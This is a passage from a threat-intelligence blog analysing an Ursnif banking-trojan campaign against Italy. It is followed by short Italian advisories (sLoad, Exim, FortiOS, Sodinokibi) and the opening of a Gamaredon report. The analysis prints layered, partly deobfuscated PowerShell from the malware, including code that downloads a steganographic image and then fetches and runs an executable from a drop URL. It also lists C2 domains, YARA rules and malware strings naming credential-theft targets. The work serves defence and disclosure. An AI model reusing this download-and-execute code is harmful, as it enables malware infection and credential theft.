-f't','d(f1e','m))')))+("{2}{0}{1}" -f 'eo=','L',';f1')+' B'+'yte'+("{1}{0}"-f ' 165','[]')+'60'+((("{0}{1}" -f ';','(0..')))+'35)'+'uXc'+'%'+'{'+((("{2}{0}{1}" -f'each','(f','for')))+'1ex'+((("{1}{0}" -f'in(',' ')))+'0.'+'.4'+'59)'+'){f'+'1ep'+("{0}{1}"-f'=f','1e')+("{1}{0}" -f 'et','g.G')+((("{0}{1}{3}{2}"-f 'Pixe','l(','ex,','f1')))+((("{1}{0}{2}" -f '1e_','f',');')))+'f1'+'e'+("{2}{1}{0}"-f '6','1e_*4','o[f')+'0+f'+'1'+'e'+'x'+((("{0}{1}{3}{2}"-f']=(','[math]','F','::')))+'lo'+((("{0}{1}" -f'o','r((f')))+'1'+'ep.'+((("{1}{0}"-f '15)','B-band')))+'*'+'16)'+'-b'+'o'+'r(f1e{'+'P'+'}.DN'+("{1}{2}{0}"-f 'Nn-b','ng','D')+'a'+("{0}{1}" -f 'n','d 15')+'))'+'};f1ekk='+'[S'+("{0}{1}{2}"-f'yste','m','.Tex')+'t.'+("{0}{2}{1}"-f 'En','di','co')+("{0}{1}{2}" -f'n','g]::UT','F8')+("{1}{0}{2}"-f 'Get','.','Str')+((("{0}{1}" -f'ing','(')))+'f'+'1eo'+'['+'0.'+'.'+'162'+'8'+'6])}fIQ;&'+'(D'+'Nn{'+'0}{1}DNn -ffI'+("{0}{1}" -f'Qd','fIQ,')+'fI'+((("{0}{1}" -f 'Qfi','fIQ) ')))+'f1e'+'C1f'+'1ec'+("{0}{1}"-f'2uX','c')+'&(DNn{1}{0'+'}DN'+'n'+'-'+("{1}{0}" -f 'fIQ','f')+("{2}{1}{0}" -f ',f','Q','ifI')+'IQ'+((("{1}{0}{2}"-f'IQ','dff',');f')))+'1e{kk}uXc.(DN'+'n'+'{1'+'}'+'{0}D'+'N'+'n-f'+("{1}{2}{0}"-f'Q','fIQi','fI')+','+'f'+'IQd'+'ffI'+'Q)')-CrePlacE([CHAr]68+[CHAr]78+[CHAr]110),[CHAr]34  -REPLace([CHAr]117+[CHAr]88+[CHAr]99),[CHAr]124 -CrePlacE'f1e',[CHAr]36 -REPLace ([CHAr]83+[CHAr]49+[CHAr]90),[CHAr]96 -CrePlacE ([CHAr]102+[CHAr]73+[CHAr]81),[CHAr]39) )

Code snippet 3

Resulting in the following snippet:

.("{0}{1}"-f 's','al') Dfi iex;.("{0}{1}" -f'Sa','l') L new-objeCt;${c1}=((("{6}{3}{10}{4}{8}{5}{2}{11}{1}{9}{0}{7}" -f 'w','aw','Name D','dd-T','-A','bly','A',';','ssem','ingD6','ype ','6wSystem.Dr'))."re`PLACe"(([ChAr]68+[ChAr]54+[ChAr]119),[sTriNG][ChAr]39));${c2}='$tm=''https://images2.imgbox.com/d8/0e/eyGVup7s_o.png'';$ry = [System.Net.WebRequest]::Create($tm);$ry.Method = ''HEAD'';$ra = $ry.GetResponse();$g=L System.Drawing.Bitmap((L Net.WebClient).OpenRead($tm));$o=L Byte[] 16560;(0..35)|%{foreach($x in(0..459)){$p=$g.GetPixel($x,$_);$o[$_*460+$x]=([math]::Floor(($p.B-band15)*16)-bor(${P}."g"-band 15))};$kk=[System.Text.Encoding]::UTF8.GetString($o[0..16286])}';&("{0}{1}" -f'd','fi') $C1$c2|&("{1}{0}"-f'i','df');${kk}|.("{1}{0}"-f'i','df')

Code Snippet 4

This piece of code is quite familiar in the ursnif infection chains, it is responsible to download a particular PNG image from image sharing platforms, such as “imgbox.com”. The image contains further powershell code hidden through the LSB steganography techniques we already described.

Figure 3: Image downloaded by the script

The hidden code inside this apparently harmless picture is the following:

if((g`E`T-date -uformat ('%B')) -like ("{1}{0}"-f'gg*','*')){& ( $vERboSEPrefeRENCE.TosTRInG()[1,3]+'x'-Join'')(New-OBJeCT  Io.COmpREssiOn.DefLatEStREAm( [Io.MemORySTream] [ConvErt]::fRoMBAse64STrING(' OBFUSCATED PAYLOAD THREE ' ), [Io.compREsSIon.ComPrEssIoNmODE]::dECOMprEsS ) | foreaCH-obJect{ New-OBJeCT SYstEM.io.StreAmREAdER($_,[TExt.ENcodINg]::ASCII )}).reADtoEnD()}

Code Snippet 5

Closely observing the first line of code, is possible to notice this code will be executed only if a particular condition is met: it retrieves the current date, extracting the month field, in this case is May (“Maggio” in Italian) and compares it to the regular expression “*gg*”. This check ensures the target user is Italian and the sample is run according to the campaign timespan. Once the condition is met, the “OBFUSCATED PAYLOAD THREE” is executed revealing another obfuscated layer.

" $( sET  'OFs' '')"+ [sTRiNG]( ' OBFUSCATED PAYLOAD FOUR ' -sPLIT'@'-sPLiT '&' -SPlIt 'B'-spLIT't'-SPliT 'Y'-spLiT 'e'-spLIt ':' -sPLIt'<' -sPLIt 'm'-SPLit 'n' | FOrEACh-obJEcT{ ([CoNvERt]::ToinT16(( $_.tOStrinG() ) , 8)-AS[chaR]) }) +" $( Set-itEM  'VArIAblE:ofS' ' ' )" |&((gV '*mdR*').nAME[3,11,2]-JOIn'')

Code Snippet 6

This fourth payload is substantially hex encoded with the addition of other particular chars and can be reconstructed using the “[Convert]::ToInt16()” function, unveiling another layer:

(NeW-ObJEct syStEm.iO.compReSsIOn.dEfLatESTrEAM([Io.MeMoRySTReAm] [sYsteM.COnveRT]::fRombAsE64sTRINg(' OBFUSCATED PAYLOAD FIVE '),[sYstEm.Io.CompREsSIoN.cOmprEsSIonmoDE]::DeCoMPress )| FOrEACH {NeW-ObJEct SYstem.iO.StREaMREadER($_, [sYsTEm.tExT.eNCodinG]::aSCii )}).Readtoend() | & ( $enV:COmSpeC[4,26,25]-join'')

Code snippet 7

Fifth payload is a compressed Base64-encoded string immediately decompressed and executed, enabling even a sixth step:

(' OBFUSCATED PAYLOAD SIX '.SpLit( 'V%JLg<,t}y')|foreaCh{[cHaR]( $_-bxOr'0x52' )}) -jOIn ''| & ((vaRiABlE '*MDR*').NamE[3,11,2]-join'')

Code Snippet 8

This layer is quite different because it contains a junk-char enriched hexadecimal code, actually XOR encrypted with the 0x52 key. Its result is:

. ((vari`A`BlE ("{1}{0}" -f'r*','*md'))."n`Ame"[3,11,2]-jOiN'') (('&(iIm{0}{1}iIm-f6c0wr6c0,6c0it'+'e'+("{9}{4}{1}{10}{0}{7}{5}{6}{8}{2}{3}"-f'00000000','0','000;&','(',') 0','00','0','0000000','00000','6c0','0')+'iIm{1}{0}iIm-f 6c0p6c0,6c0slee6c0) (5*20);i'+((("{6}{5}{2}{4}{0}{3}{7}{8}{1}{9}"-f '+','0Xb',' ((6c0HKC','6c0','6c0','6c0)','f((&(6c0gp','U:6c0+','6c','D')))+("{7}{0}{8}{2}{3}{9}{1}{6}{4}{5}{10}" -f'6c0+6','c0b','6c0','+6c0','c0+6c0Deskt6c0+','6c','D6','Con','c0trol ','PanelX6c0+6','0op6c')+("{8}{10}{6}{2}{1}{0}{9}{3}{7}{4}{5}"-f '(','E','c','CHar]88',']98','+[CHar]','la','+[CHar','0) -cRE','[','p')+((("{1}{0}{2}" -f'8),[C','6','Har')))+']92) o6F .(iIm{0}{1}iIm-f 6c0Sele6c0,6c0ct6c0) -Property (6c0*6c0)).iImprEFEr4xTRE4xTD'+("{0}{1}{2}" -f'U4x','T','I4xTl')+("{0}{3}{1}{2}" -f 'A','UAG','esiIm','NG')+((("{0}{2}{1}{3}"-f' -l','ke (','i','6c0')))+'*t-6c0+6c0I*6c0)){lH0{gO}'+((("{3}{1}{14}{2}{16}{7}{0}{6}{5}{9}{12}{10}{13}{4}{11}{8}{15}" -f'6c0','c0htt','c0+6c0//','=(6','fo','tindef.6','a','d6c0+','/6c0+6c0///6c0+6c0/6c0+6c0/6c','c','c0in6c0+6c','6c0+6c0/','0+6','0','ps:6','0+6c0','newup')))+("{3}{5}{0}{1}{2}{4}"-f '..6','c0+','6c0..6c','/....6c0+6c0','0+','..')+("{1}{0}{2}{3}" -f 'c0.e6c0+','6','6c0x','e')+'6c0),iImiIm;foreach(lH0{u} in lH0{G4xTO}){Try{lH0{R4xTI} = iImlH0env:temp8SdTwain002.exei'+'Im;lH0{k4x'+'Tl} '+'= &(iIm{1}{2}{0}iIm -f6'+'c0ect6c0,6c0New-O6c0,6c0bj6c0) (iIm{5}{4}{1}{'+'0}{3}{2}iIm-f6c0eb6c0,6c0tem.Net.W6c0,6c0t6c0'+',6c0Clien6c0,6c0s6c0,6c0Sy6c0);lH0{K4xTL}.iImHEA4xTDErsiIm.(iIm{0}{1}iIm-f 6c0Ad6'+((("{17}{26}{11}{0}{6}{16}{20}{1}{3}{23}{9}{13}{8}{22}{18}{19}{4}{14}{15}{21}{25}{24}{2}{5}{12}{7}{10}"-f'c','e((6c0','c0Win','use',',(6c0Moz','dow6','0','0+','-age','c0+','6c',',6','c','6c0r','illa6c0','+','d','c','6c0','t6c0)','6c0).Invok','6c0/5.','n6c0+','6','0+6','0 (6c','0')))+("{5}{1}{9}{7}{12}{2}{0}{11}{8}{3}{6}{10}{4}"-f '6','0+','in','6c0+6c0 ',' ','0s6c','x64;6',' NT 10.0; ',';','6c0','c0+6c0','4','W')+("{6}{2}{0}{5}{4}{7}{1}{3}" -f'r','v:','0+6c0','66.06c0+6','+6c','6c0','6c','0')+((("{2}{6}{3}{0}{5}{4}{1}"-f'0+','+','c0) Gec6c0+6','0k6c','6c0','6c0o','c')))+("{2}{4}{8}{6}{1}{5}{0}{3}{7}"-f '00','c0+6','6c0/206c0+','6c0+','6','c','016','6','c')+("{1}{0}"-f'001','c')+("{0}{1}{2}"-f '6','c0+6c','0')+("{1}{0}{2}"-f '+6','016c0','c0 Fi')+((("{0}{6}{9}{4}{8}{2}{7}{3}{5}{1}"-f're6','006c0))','6','6c0+6','/','c','c0+6c','c0+6c06.','6','0fox')))+';lH0{KL}.(iIm{2}{1}{3}{0}iIm -f6c0e6c0,6c0nload6c0,6c0Do'+'w6'+'c0,6c0Fil6c0).Invoke(lH0{u}'+', lH0{rI'+'});if((lH0{hO4xTst}.iImCurr'+'4xTentc4xTUl4xTTuREiImo6F .(iIm{1}{0}{2}iIm-f6c0t-Str'+((("{2}{5}{0}{8}{3}{4}{10}{6}{7}{9}{1}" -f '0,6','0*a6c0','6','Ou6c0,','6c0','c','0)) -li','ke (','c0','6c','ing6c')))+'+6c0li*6c0)){&(iIm{0}{1}iIm-f6c'+'0'+("{3}{2}{1}{0}" -f'0ps','c0,6c','6','Sa')+'6c0'+') lH0{RI};break}}Catch{.(iIm{'+'2}{1}{3}{0}iIm-f 6c0ost6c0,6c0te-6c0,6c0Wri6c0,6c0H6c0) lH0{_}.iImExce4xTPt4xTiON'+("{1}{2}{3}{0}{4}"-f's','i','Im.iIm','ME','4xTs4xTAgE')+'iIm}}}')."r`EpLAcE"(([cHAR]111+[cHAR]54+[cHAR]70),[stRiNg][cHAR]124).('r'+'eplA'+'cE').Invoke('8Sd','\')."R`E`PLace"(([cHAR]52+[cHAR]120+[cHAR]84),[stRiNg][cHAR]96)."REp`la`Ce"(([cHAR]105+[cHAR]73+[cHAR]109),[stRiNg][cHAR]34)."r`e`pLaCE"('lH0',[stRiNg][cHAR]36)."r`EplA`Ce"(([cHAR]54+[cHAR]99+[cHAR]48),[stRiNg][cHAR]39))

Code Snippet 9

At this point, the code is almost in clear. We noticed some additional replace operations to obfuscate the code, so we headed into the last step of the obfuscation:

&("{0}{1}"-f'wr','ite') 00000000000000000000000000000;&("{1}{0}"-f 'p','slee') (5*20);if((&('gp') (('HKC'+'U:'+'XbDCon'+'trol '+'PanelX'+'bD'+'Deskt'+'op') -cREplacE([CHar]88+[CHar]98+[CHar]68),[CHar]92) | .("{0}{1}"-f 'Sele','ct') -Property ('*'))."prEFEr`RE`DU`I`lANGUAGes" -like ('*t-'+'I*')){${gO}=('https:'+'//newupd'+'atindef.'+'in'+'fo'+'//'+'///'+'/'+'/'+'/....'+'....'+'..'+'.e'+'xe'),"";foreach(${u} in ${G`O}){Try{${R`I} = "$env:temp\Twain002.exe";${k`l} = &("{1}{2}{0}" -f'ect','New-O','bj') ("{5}{4}{1}{0}{3}{2}"-f'eb','tem.Net.W','t','Clien','s','Sy');${K`L}."HEA`DErs".("{0}{1}"-f 'Ad','d').Invoke(('use'+'r-agen'+'t'),('Mozilla'+'/5.0 ('+'Window'+'s'+' NT 10.0; Win64;'+' x64;'+' '+'r'+'v:66.0'+') Gec'+'k'+'o'+'/20'+'1'+'0'+'01'+'01'+' Fire'+'fox/6'+'6.'+'0'));${KL}.("{2}{1}{3}{0}" -f'e','nload','Dow','Fil').Invoke(${u}, ${rI});if((${hO`st}."Curr`entc`Ul`TuRE"| .("{1}{0}{2}"-f't-Str','Ou','ing')) -like ('*a'+'li*')){&("{0}{1}"-f'Sa','ps') ${RI};break}}Catch{.("{2}{1}{3}{0}"-f 'ost','te-','Wri','H') ${_}."Exce`Pt`iON"."MEs`s`AgE"}}}

Code Snippet 10

This is the last step, at least for the “powershell stage”. In fact, this step shows the purpose is to download a PE32 payload from a very hidden drop-site location, move it into %TEMP% path and run it.

The Loader

At this point, we analyzed an incredibly tricky series of obfuscated powershell snippets, but we don’t have to forget the PE32 payload.

Hashbb5dab56181dbb0e8f3f9182a32e584315cd1e6e2fedb2db350e597983f0e880
ThreatUrsnif/Gozi
Brief DescriptionUrsnif Loader
Ssdeep3072:Zt9f0C4/DX3IVyvLUZPcQLdSWwTBFkdOlJ7Jo2QyiMpT uS5/y33lRzih:310C4/rtQLdHkFkA/Vq

Table 2: Static info about Ursnif Loader

This sample is the classic Ursnif DLL loader able to inject malicious code into the "explorer.exe" process. This particular sample has been downloaded from “loaidifds[.club” server.

Figure 4: Ursnif loader communication

The final payload is simply a base64-encoded Portable Executable file: the dll to be injected into the “explorer.exe” process.

The Payload

Hashabb8a8351bb83037db94cd2bb98a8f697260f32306c21a2198c6b7f1a3bd1957
ThreatUrsnif Banking trojan
Brief DescriptionUrsnif Malicious dll
Ssdeep3072:czZRVXwQxvJfNkn7kXkFvnHoqlalhKWxSx3NUWvG5NpM3jteLb:QZRVXnxv1Nknqsgqlal4uEUWWN

Table 3: Static information about the Ursnif malicious DLL

This is a typical Ursnif malware payload. In order to extract some interesting data, we manually analyzed it.

Figure 5: Debugging view

Inspecting the dll, we noticed it embeds three C2 reference on its configuration. During the analysis, the first two C2s, filomilalno[.club and fileneopolo[.online, were still active. Moreover, analyzing the DLL we identified some other interesting configuration strings, which will be reported in the Configuration strings section.

The Windows 10 Branch

Back in "Code Snippet 2" we described the check about the Windows OS version installed. But this time, we proceed with the analysis of the other control-flow branch, the Windows 10 one:

$h='[email protected]( OBFUSCATED PAYLOAD TWO )'.replace('c',',0,');$h=$h.replace('b',',101,');$h=$h.replace('a',',0,0,0,');.($b)($h);[Reflection.Assembly]::Load([byte[]]$y)|Out-Null;.($b)([SA.Sii]::pf())

Code Snippet 11

The structure of the instructions is quite easy: the PAYLOAD TWO actually is a sequence of decimal numbers immediately replaced with other chars. When the replacement is over, the payload is executed thanks to the following command:

[Reflection.Assembly]::Load([byte[]]$y)

This means, the content of the variable “$y” actually is a .NET Dynamic Linked Library. It has the following static information:

Figure 6: Static info about the encoded Ursnif dropper DLL hidden inside PAYLOAD TWO

The purpose of this DLL is to download another PNG image containing a series of commands, hidden through steganography techniques. Interestingly, the Library has no exported functions and the loaded code is directly invoked by the powershell command "([SA.Sii]::pf())", in "Code Snippet 11", retrieving class “Sii” inside namespace “SA” and invoking the static method “pf”:

Figure 7: Image downloading routine
Figure 8: Downloaded Image

The pf() method is designed to download the PNG image in Figure 8 from the legit “postimg[.cc” platform. In this case, the steganography technique is not the same as the one seen in the other branch, in fact the malware also uses a layer of the AES encryption. An avid readers could also notice the peculiarity of the encryption schema used in the DLL: the encryption not only provides confidentiality against on-the-wire steganalysis, but also provides an additional country-check to ensure the victim is one of the designed target. In fact, the decryption key is generated starting from the LCID property of the current "CultureInfo", data structure providing information about calendar,language and locale in use on the machine.

Figure 9: Steganography and payload decryption routine

The return value of the “pf()” function is the payload hidden inside the figure above. Obviously, it is an obfuscated powershell script. As in the previous branch, the payload contains various heavily obfuscated layers, this time six.

Figure 10: Synthetic representation of the obfuscation layers of the powershell script

The sixth powershell stage of this branch contains  not only one country check, but two.

The first check is for the “HKCU:\Control Panel\Desktop” registry key, which must have  a “Preferred Languages” matching the “It” string, and the second one looks for the result of the powershell command “${host}.CurrentCulture” that have to match the substring “*ali*”, clearly referencing the Italian one.

  if((&('gp') ((("{0}{4}{3}{1}{5}{2}"-f'HKCU:{0}Control P','}D','sktop','l{0','ane','e'))  -f [Char]92) | &("{0}{1}" -f 'Sele','ct') -Property ('*'))."p`R`efeRR`EduiL`AnguA`gES" -like ("{1}{0}" -f'*','*t-I')){${GO}=("{0}{4}{3}{7}{1}{5}{6}{2}" -f'https://newupd','///......','e','f.info///','atinde','....','.ex','//'),"";foreach(${u} in ${GO}){Try{${RI} = "$env:temp\Twain002.exe";${k`L} = .("{1}{0}{2}" -f 'ec','New-Obj','t') ("{0}{4}{2}{3}{1}" -f 'System.Ne','nt','Cl','ie','t.Web');${Kl}."Head`ers"."A`DD"(("{2}{1}{0}{3}" -f'e','r-ag','use','nt'),("{10}{14}{6}{12}{8}{5}{3}{7}{11}{13}{0}{2}{15}{9}{4}{1}"-f'64;','Firefox/66.0',' rv:6',' W',' ','10.0;','o','in',' NT ',' Gecko/20100101','Mozilla/5.0 (','64; ','ws','x','Wind','6.0)'));${k`L}."DOWNl`oadf`ilE"(${u}, ${r`I});if((${h`osT}."Cu`Rr`En`T`cultURe"| &("{1}{0}{2}" -f'-Stri','Out','ng')) -like ("{1}{0}"-f'i*','*al')){.("{0}{1}"-f 'S','aps') ${Ri};break}}Catch{&("{2}{3}{1}{0}" -f't','s','Write-','Ho') ${_}."EXC`epTION"."m`ES`SAge"}}}  

Code snippet 12

After that, we retrieved the same payload described in section “The Loader”.

Conclusion

Cybaze-Yoroi ZLAB team analyzed many Ursnif related attacks in the past months, the recent ones are showing evidence of an increasing sophistication and complexity, especially in the weaponization phase of the attack killchain, in the preparation of such multi-layered and highly obfuscated infection chain to deliver the Ursnif payload.

Considering the volume and the insistence of this malware threat against the Italian panorama, is clear the Threat Groups behind these attacks are strongly leveraging an automated weaponization of the attacks, investing resources, time and money to prepare these complex and geo-located infection chains. Indicating Italy is persistently targeted by cyber-crime actors who reached some degree of organizational maturity and keeps evolving their attack techniques, implying an increased risk for Italian Companies and Organizations.

Indicators of compromise

Hashes

Dropurl

C2

Yara Rules

import "pe"
rule Ursnif_Excel_Dropper_1905 {
meta:
	description = "Yara Rule for Excel Ursnif Dopper of the campaign of End of May 2019"
	author = "Cybaze - Yoroi ZLab"
	last_updated = "2019-06-04"
	tlp = "white"
	category = "informational"
strings:
	$s1 = "TvZjuM4ku8L7D"
	$s2 = "dhgfdd5d6udujdhg9"
	
	$a1 = { 6F 6C 65 3E 02 19 00 73 00 74 00 64 00 6F 00 80 }

condition:
	all of them
}

rule Ursnif_Loader_1905 {
meta:
	description = "Yara Rule for Ursnif Loader of the campaign of End of May 2019"
	author = "Cybaze - Yoroi ZLab"
	last_updated = "2019-06-04"
	tlp = "white"
	category = "informational"
strings:
	$s1 = ">rdP/dfn"
	$s2 = "c:\\team\\let\\Require\\livebottom.pdb"
	
	$a1={ E9 5D 3C CD 49 DC 51 C8 }

condition:
	all of them
}

rule Ursnif_Malicious_DLL_1905 {
meta:
	description = "Yara Rule for Ursnif Loader of the campaign of End of May 2019"
	author = "Cybaze - Yoroi ZLab"
	last_updated = "2019-06-04"
	tlp = "white"
	category = "informational"
strings:
	$s1 = "GET t'=PUT t =POSTt"
	$s2 = "xul.dll"
	$s3 = "CHROME_CHILD.DLL"

condition:
	uint16(0) == 0x5A4D and all of them
}

Strings

May 26 2019
CHROME.DLL
soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
&ip=%s
&os=%s
%u.%u_%u_%u_x%u
&tor=1
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
http://
https://
file://
USER.ID
%lu.exe
/upd %lu
Software\AppDataLow\Software\Microsoft\
Main
Block
Temp
Client
Ini
Keys
Scr
Kill
LastTask
LastConfig
CrHook
OpHook
Exec
.onion
TorClient
TorCrc
%s %s HTTP/1.1
Host: %s
User-Agent: %s
Connection: close;
Content-length: %u
http://constitution.org/usdeclar.txt
C:\Program Files\Internet Explorer\iexplore.exe
Software\Microsoft\Windows\CurrentVersion\Run
System\CurrentControlSet\Control\Session Manager\AppCertDlls
{%08X-%04X-%04X-%04X-%08X%04X}
%08X-%04X-%04X-%04X-%08X%04X
S:(ML;;NW;;;LW)D:(A;;0x1fffff;;;WD)(A;;0x1fffff;;;S-1-15-2-1)
open
%lu.bat
attrib -r -s -h %%1
:%u
del %%1
if exist %%1 goto %u
del %%0
\Vars
\Files
\Config
\Run
/data.php?version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
/UPD
/SD
/sd %lu
\Software\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
NSPR4.DLL
NSS3.DLL
%APPDATA%\Mozilla\Firefox\Profiles
EnableSPDY3_0
\Macromedia\Flash Player\
cookies.sqlite
OPERA.EXE
cookies.sqlite-journal
EMPTY
Cmd %s processed: %u
 | "%s" | %u
Cmd %u parsing: %u
PR_Read
PR_Write
PR_Close
.set MaxDiskSize=0
.set DiskDirectory1="%s"
.set CabinetName1="%s"
.set DestinationDir="%S"
"%s"
\setup.inf
\setup.rpt
makecab.exe /F "%s"
cmd /C "%s> %s1"
systeminfo.exe 
tasklist.exe /SVC >
driverquery.exe >
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >
cmd /U /C "type %s1 > %s & del %s1"
net view >
nslookup 127.0.0.1 >
echo -------- >
nslookup myip.opendns.com resolver1.opendns.com 
Main
Blocked
user_pref("network.http.spdy.enabled", false);
prefs.js
%s=%s&
/images/
.avi
HTTPMail
SMTP
POP3
IMAP
none
WABOpen
Software\Microsoft\Windows Mail
Software\Microsoft\Windows Live Mail
Store Root
Salt
account{*}.oeaccount
Server
User_Name
Password2
Port
Secure_Connection
type=%S, name=%S, address=%S, server=%S, port=%u, ssl=%S, user=%S, password=%S
NSS_Init
hostname
type=%S, name=%s, address=%s, server=%s, port=%u, ssl=%s, user=%s, password=%s
NSS_Shutdown
mail
MessageAccount
PK11_FreeSlot
Account_Name
PK11_Authenticate
SMTP_Email_Address
encryptedUsername
%S_%S
encryptedPassword
Email
EmailAddressCollection/EmailAddress[%u]/Address
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
&uptime=%u
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Client32
Client64
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\
%systemroot%\syswow64\cmd.exe
Account Name
/C pause dll
.gif
IMAP Server
IMAP Port
IMAP User
IMAP Password
IMAP Use SSL
.jpeg
POP3 User
POP3 Server
POP3 Port
POP3 Password
POP3 Use SSL
.bmp
.avi
SMTP User
SMTP Server
SMTP Port
SMTP Password
SMTP Use SSL
ICGetInfo
A8000A
ICSendMessage
1.0
nss3.dll
PK11_GetInternalKeySlot
PK11SDR_Decrypt
%systemroot%\system32\c_1252.nls
%PROGRAMFILES%\Mozilla Thunderbird
%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default
\logins.json
%S %S, %S, %S
%c%02X
SOFTWARE\Microsoft\Windows NT\CurrentVersion
InstallDate
\\.\%s
rundll32
msvfw32
ICOpen
ICClose
ICInfo
rundll32 "%s",%S
DllRegisterServer
IsWow64Process
Wow64EnableWow64FsRedirection
D:(D;OICI;GA;;;BG)(D;OICI;GA;;;AN)(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)
%userprofile%\AppData\Local\Google\Chrome\User Data\Default\cache
%userprofile%\AppData\Local\Mozilla\Firefox\Profiles

This blog post was authored by Luigi Martire and Luca Mella of Cybaze-Yoroi Z-LAB

Campagna di Attacco sLoad verso PEC Italiane

Proto: N040619.

Con la presente Yoroi desidera informarLa riguardo al recente rilevamento di una pericolosa campagna di attacco ai danni di Organizzazioni ed Aziende italiane. L’ondata di email fraudolente simula l’invio di documenti di fatturazione verso le caselle di Posta Elettronica Certificata aziendali. All'interno di questi messaggi sono presenti link volti allo scaricamento di file malevoli, nella fattispecie archivi in grado di infettare le vittime con impianti della famiglia sLoad, minaccia in grado di intercettare digitazioni utente e permettere l’installazione di ulteriori malware.

Figura. Esempio messaggio di posta malevolo

Di seguito si riportano gli indicatori di compromissione individuati:

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

Grave Vulnerabilità in Server di Posta Exim

Proto: N030619.

Con la presente Yoroi desidera informarLa riguardo al rilevamento di una grave vulnerabilità all’interno di Exim, diffusissimo server di posta open-source utilizzato da service provider, produttori di tecnologie, organizzazioni ed aziende. La criticità è nota con l’identificativo CVE-2019-10149.

Figura. Esposizione Internet di server di Posta Exim in Italia (Fonte:ZoomEye)

La problematica è originata da gravi lacune nella gestione degli indirizzi destinatario all’interno della routine di consegna messaggio di Exim, attraverso le quali un attaccante remoto senza particolari accessi può essere in grado di eseguire comandi arbitrari sul server bersaglio, compromettendone la sicurezza ed accedendovi abusivamente.

Il Manutentore ha confermato la problematica per le versioni Exim comprese tra 4.87 e 4.91 inclusa, specificando che la vulnerabilità è potenzialmente sfruttabile anche da remoto in scenari di utilizzo relativamente comuni, ad esempio: qualora Exim sia configurato con il supporto ai tag “local_part_suffix”, qualora sia utilizzato come MTA secondario con funzioni di relay o, in generale, qualora la configurazione di validazione del destinatario “verify=recipient” fosse stata disabilitata.

Per via della pubblicazione di dettagli tecnici atti a riprodurre la criticità e della potenziale esposizione internet dei servizi afflitti, Yoroi consiglia caldamente di aggiornare i servizi di posta Exim alla versione 4.92 o superiore e di applicare le patch di sicurezza recepite dai principali manutentori di sistemi linux-based (e.g. Red-Hat, Debian).

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

Grave Vulnerabilità in FortiOS

Proto: N020619.

Con la presente Yoroi desidera informarLa riguardo al rilevamento di una importante vulnerabilità nel sistema operativo FortiOS, cuore dei noti appliance di sicurezza prodotti da Fortinet diffusi in Piccole-Medie aziende e realtà Enterprise. La criticità è nota con l’identificativo CVE-2018-13382.

La problematica è causata da gravi lacune nella gestione delle autorizzazioni utente all’interno dei moduli SSL VPN, attraverso le quali un attaccante remoto non autenticato può effettuare un cambio password arbitrario alle utenze VPN locali configurate nel sistema, prendendone il controllo per abusarne al fine di ottenere accesso alle reti interne.

Il Vendor ha confermato la problematica attraverso l'apposito bollettino di sicurezza FG-IR-18-389, dove risultano afflitti i moduli SSL VPN(web-mode e tunnel-mode presenti nelle versioni FortiOS:

Per via della potenziale esposizione internet dei dispositivi afflitti e degli accessi che eventuali attaccanti di rete otterrebbero a seguito dello sfruttamento della criticità in oggetto, Yoroi consiglia di pianificare l’installazione gli aggiornamenti FortiOS resi disponibili dal Produttore. Qualora non fosse possibile applicare tali patch, si suggerisce di valutare la disabilitazione dei servizi vpn o quantomeno la configurazione di utenze VPN remote basate sui protocolli LDAP o RADIUS.

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

Nuova Campagna di Attacco Ransomware/Sodinokibi

Proto: N010619.

Con la presente Yoroi desidera informarLa relativamente al recente rilevamento di pericolose ondate di attacco ai danni di Utenti ed Organizzazioni italiane. I messaggi di posta fraudolenti tentano di simulare comunicazioni di carattere legale, relative ad invii di documenti e notifiche di comparizione. All’interno delle email sono presenti archivi compressi protetti da password contenenti pericolosi file in grado di mettere in esecuzione una nuova minaccia Ransomware denominata "Sodinokibi", capace di rendere inutilizzabili i file contenuti nella macchina vittima e nelle cartelle di rete da essa raggiungibili.

Figura. Messaggio di riscatto Ransomware/Sodinokibi

Di seguito si riportano gli indicatori di compromissione legati alla campagna in oggetto:

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

The Russian Shadow in Eastern Europe: A Month Later

Introduction

The Gamaredon attacks against Ukraine doesn't seem to have stopped. After a month since our last report we spotted a new suspicious email potentially linked to the Gamaredon group. The group was first discovered by Symantec and TrendMicro in 2015 but evidence of its activities has been dated back to 2013. During recent times, Gamaredon is targeting the Ukrainian military and law enforcement sectors too, as officially stated by the CERT-UA.

Cybaze-Yoroi ZLAB team dissected the artifact recovered from their latest attack to figure out evolution or changes in the threat actor TTPs.

Technical Analysis

Figure 1. Malicious e-mail

The infection chain is composed by different stages of password protected SFX (self extracting archive), each containing vbs or batch scripts.

